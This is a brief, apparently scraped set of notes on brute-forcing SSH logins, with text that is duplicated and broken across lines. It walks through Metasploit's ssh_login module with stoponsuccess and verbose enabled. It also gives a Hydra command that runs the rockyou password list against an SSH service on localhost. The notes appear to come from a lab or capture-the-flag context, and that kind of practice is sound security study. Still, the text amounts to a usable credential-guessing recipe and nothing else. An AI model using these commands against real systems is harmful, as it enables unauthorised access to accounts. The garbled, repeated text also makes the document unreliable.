- Fire up
msfconsole
, searchssh_login
. Enterinfo
to see all options. Recommended: setstoponsuccess
andverbose
to be true. - Hydra:
hydra -l username -P /usr/share/seclists/rockyou.txt -s PORT ssh://127.0.0.1
msfconsole
, search ssh_login
. Enter info
to see all options. Recommended: set stoponsuccess
and verbose
to be true.hydra -l username -P /usr/share/seclists/rockyou.txt -s PORT ssh://127.0.0.1